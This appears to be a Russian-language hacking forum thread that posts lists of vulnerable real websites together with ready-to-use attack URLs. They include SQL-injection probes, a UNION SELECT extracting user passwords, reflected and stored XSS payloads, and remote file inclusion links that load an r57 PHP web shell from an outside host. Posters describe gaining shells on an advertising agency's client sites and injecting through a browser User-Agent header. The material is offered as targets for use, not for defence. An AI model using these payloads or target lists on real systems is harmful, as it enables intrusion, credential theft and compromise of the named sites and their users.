http://www.amira-toys.ru/show_cart.php?new=3101&catid=24&PHPSESSID=d079c6865f941a8648a9007892607398' http://www.autozap4asti.ru/parts.php?task=showTree&carid=525&mod=246&typeid=8902' http://www.stails.ru/index.php?id=6&PHPSESSID=2d6748571c1e52b2071cb3fa7b18d9aa' http://www.upk1.ru/index.php?id=15&add=1&parent_id=22' http://test.fanfics.ru/index.php?section=3&id=221' http://www.utravel.ru/search.php?pin=1133872666&tourid=74' http://minagro.gov.ua/sgbazi/zr/protect.php3?id=3' http://www.komfarm.by/press-centre.php?page=1&id=27&Show=0' http://www.kalitka-plitka.ru/catalog/?id=16&sub=32&stuff=28&PHPSESSID=e290f7c002397d6fa05d621d31948b26'
http://www.mail.zp.ua/action.php?action=aff_mail&mail=1&sort=1&folder=INBOX&sortdir=1&lang=' Какой-то левый ТИПА инклуд. Хер поймёшь. В этой строке есть ещё пару уязвимых параметров, но они ничего не дают. Тока ошипку.
Вот нашел сайт с тестом типа (Хочешь узнать кое-что про себя? ) ну я в ответы поставил. '><script>alert('HakNet')</script> проходит не фильтруетса.. сайт http://www.mostinfo.net/hlam/test/
Нашёл сайт рекламного агенства hxxp://www.proreklamy.ru/. Между прочих услуг есть создание сайта от 500$ и до 1500$. "Ого", - подумал я и решил поискать sql в запросе hxxp://www.proreklamy.ru/?module=custompage&id=6. И что вы думаете? Скрипт инклудит страницу custompage.php без каких-либо проверок!!! Заливаем на народ шелл с расширением php и подставляем в урл - всё, у нас шелл!!! И так сделано большинство их сайтов за 500-1500 зелёных! Я уже молчу про strict'ы или хотя бы transitional - там НЕТ декларации вовсе! Вывод: главное - PR, а остальное - ничто!
__http://www.dunas.com.br/ing/main.php?inc=filo __http://www.rus-fish.ru/?pg=xxx __http://85.10.200.53/imat-uve.de/main.php?inc=%27 __http://pad.chasesdream.com/orion/downloads.php?cat=1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20orion_users%20WHERE%20user_id=2/*
http://www.sbsonline.org/publicatio...ry.php?dis=http://someshit.nm.ru/r57shell.php http://www.opitz.pl/body.php?txt=http://someshit.nm.ru/r57shell.php http://www.papunet.net/bliss/index.php?pid=246' http://www.papunet.net/yleis/txt/tyokalut/ohjelmat/?tiedosto=vinkki_oma.php' http://www.fitzmuseum.cam.ac.uk/opa...pha=A&_callingurl=/opac/opac_objectnames.php' http://www.airis.ru/mpage.php?pgname=../../mpage.php&text= http://www.clubnews.ru/forum/profile.php?mode=sendpassword http://www.emal.kanash.ru/?dir=http:&page=/someshit.nm.ru/r57shell
XSS на pages.ru (интересно, а кто-нибудь с АЧата на нём хостится ): _http://www.pages.ru/search.html?text=%3Cscript%3Ealert%28%2Fback0rifice%2F%29%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8 - тройной alert() не хотели, хех ?! Кто-нибудь юзает качалку GetRight? Тогда - держите XSS и не отрывайтесь: _http://www.headlightinc.com/cgi-bin/faq.cgi?filter=%3Cscript%3Ealert%28%2Fback0rifice%2F%29%3C%2Fscript%3E&submit1=Search
http://www.hce.ru/proekt/cafe_action2.php3?numk=7' http://books.begin.ru/tops10.phtml?c_id=107' http://eng.unionmedia.info/structdoc.html?he_id=231&do_id=199' http://www.hro.org/php/person_info.php?id=467'1 http://www.ligocom.ru/rindex.php?Var=%D0%E0%E1%EE%F2%E0&Var1=Item http://www.bankir.by/modules.php?name=Qwe&ac=print&id= http://www.kanzler.sbor.ru/?s=3'5 http://www.goclub.ru/resident.html?id=10&PHPSESSID=e24c3a8efffe63d1e0bc0ea35fac112'2 http://www.ooozao.ru/index.php?id=4'4
http://www.privat.ua/search?page=1&mode=simple&searchString=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E http://www.kuivstar.net в поиску водим '><script>alert('HakNet')</script>
http://www.tvernews.ru/?newsid=116'29 http://www.spidermania.ru/index.php?action=12&id=9' http://webchess.ru/index.php?module=gallery&file=disp_img&id_img=&stat=ok http://www.regens.ru/benefits/firms/entrench/ http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb27748'5 http://drakkar.good.ru/index.php?act=guest&news_position=-4' http://www.televek.ru/phones/SonyEricsson/934/&https:/sourceforge.net/projects/fma/& http://squash.com.ua/rus/news/?page=27&news_id=50'0 http://karatedojo.uazone.net/printitem.php3?newsid=8' http://www.kcnti.ru/orgot/lookorg.php?id=8' http://www.vw-club.ru/anno/show_anno.php?id=366' http://www.algis.ru/main.php?f=21&n=10&id=18'0 http://www.gerdabook.ru/vet/view.php?id=5017'2
_http://www.ce.unipr.it/~ghelfi/Sphinx/body.php?page= _http://www.edu.ru/modules.php?name=Web_Links&l_op=viewlink&cid=
http://www.extrovert.ru/?id=929 http://www.multi-tech.ru/index.php?goto=gallery&showimage=34' http://www.notoshoes.ru/singl.php?tp=2&p=7&tid=33400' http://www.astmui.ru/index.php?id=news_more&news_id=1' http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb27748'5 http://mediapro.com.ua/news/text.php?id=47'3 http://noclick.net.ru/nav.php http://www.gruzautoland.ru/auto/show.php?id=5'6 http://www.comquest.ru/news/show_news.php?uid=2'3 http://www.cato.ru/pages/151?idpage=148' http://www.kaz.kz/top/kom.php?id=1' http://forumy.ru/chumakov/view.php?dat=20031223133317_1&part=8'
_www.faq-hack.ru Там лолки, а не админы. Стоит у них сниффер один в один с нашим, ачатовским. Злость пробрала - решил на баги проверить =). Сниффер первый под руку и попался. Там не фильтровалось имя браузера. Буквально 2 минуты на странице сниффера висел замкнутый цикл с алертом в предзноменование того, что я начал ковырять их сайт =). Теперь к багам... Долго не искал...лень стало... Нарыл пассивную xss(это в анонимном мэйлере): _http://faq-hack.ru/onlinesoft/mail/function.php?name=anyname&mymail=antmail&[email protected][XSS]&theme=anytheme Вторая бага - ошибка скул. Получить её можно, обратившись к снифферу и передав ему в http-заголовке имя браузера с одинарной кавычкой.
_http://customize.ru/gbook/index.php?name="><h1>test1</h1>&mail="><h1>test2</h1>&city="><h1>test3</h1>&mess=anymessage&add=Отправить Сразу когда по ссыле пройдёте, нифуя не отобразиться. А вот страничку обновите и тогда xss-ки сработают. Просто все данные передаются в кукисы, а когда страницу обновляешь данные из кукисов подставляются в формочки.
http://www.vdvsn.ru/forum/dialogue.phtml?id=276&forumName=10&page=1' http://www.v21v.ru/katalog/index.php?new_item=1' http://www.melodi.ru/index.php?p=1137482278&step=1' http://order.referats.info/content.php?wnum=390'8 http://www.seneka.ru/index.php?section=портфолио http://www.popugay.com/news/printitem.php?newsid=5'
http://html.net/newsletter/default.asp?Email='><script>alert('HakNet')</script> http://phpt.net/result.php?Keywords='><script>alert()</script> http://sedoparking.com/parking.php4?task=search&domain=inet.net&trackquery=1&s=e50b14616fbce9a5a577®istrar=&tb=0&partnerid=&language=e&keyword=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
